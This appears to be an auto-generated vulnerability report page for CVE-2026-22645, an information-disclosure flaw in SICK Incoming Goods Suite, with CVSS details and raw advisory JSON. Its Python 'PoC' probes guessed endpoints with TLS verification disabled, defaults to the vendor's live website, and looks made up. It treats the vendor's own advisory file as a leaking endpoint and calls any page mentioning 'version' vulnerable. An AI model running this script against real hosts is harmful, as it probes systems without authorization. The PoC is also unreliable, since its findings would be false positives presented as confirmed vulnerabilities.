Security Vulnerability Report
中文
CVE-2026-22645 CVSS 5.3 MEDIUM

CVE-2026-22645

Published: 2026-01-15 14:16:28
Last Modified: 2026-01-29 17:19:57

Description

The application discloses all used components, versions and license information to unauthenticated actors, giving attackers the opportunity to target known security vulnerabilities of used components.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sick:incoming_goods_suite:*:*:*:*:*:*:*:* - VULNERABLE
SICK相关应用(具体版本需参考官方通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2026-22645 PoC - Component Information Disclosure # Target: SICK application disclosing component versions def check_cve_2026_22645(target_url): """ Check if the target is vulnerable to CVE-2026-22645 This PoC attempts to access component information endpoints """ # Common endpoints that may disclose component information endpoints = [ '/api/components', '/api/dependencies', '/info', '/actuator/info', '/api/v1/info', '/version', '/api/version', '/.well-known/csaf/white/2026/sca-2026-0002.json' ] vulnerable = False results = [] for endpoint in endpoints: try: url = target_url.rstrip('/') + endpoint response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: # Check for component version information content = response.text.lower() if any(keyword in content for keyword in ['version', 'component', 'dependency', 'license', 'library']): vulnerable = True results.append({ 'endpoint': endpoint, 'status': response.status_code, 'content_preview': response.text[:500] }) except requests.RequestException as e: pass return { 'cve_id': 'CVE-2026-22645', 'vulnerable': vulnerable, 'findings': results, 'description': 'Application discloses component versions and license info' } if __name__ == '__main__': # Example usage target = 'https://www.sick.com' # Replace with actual target result = check_cve_2026_22645(target) print(json.dumps(result, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22645", "sourceIdentifier": "[email protected]", "published": "2026-01-15T14:16:28.290", "lastModified": "2026-01-29T17:19:57.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The application discloses all used components, versions and license information to unauthenticated actors, giving attackers the opportunity to target known security vulnerabilities of used components."}, {"lang": "es", "value": "La aplicación divulga todos los componentes utilizados, versiones e información de licencia a actores no autenticados, dando a los atacantes la oportunidad de atacar vulnerabilidades de seguridad conocidas de los componentes utilizados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:incoming_goods_suite:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.1", "matchCriteriaId": "E6E02E7A-B758-4262-9F62-24229C60F17A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}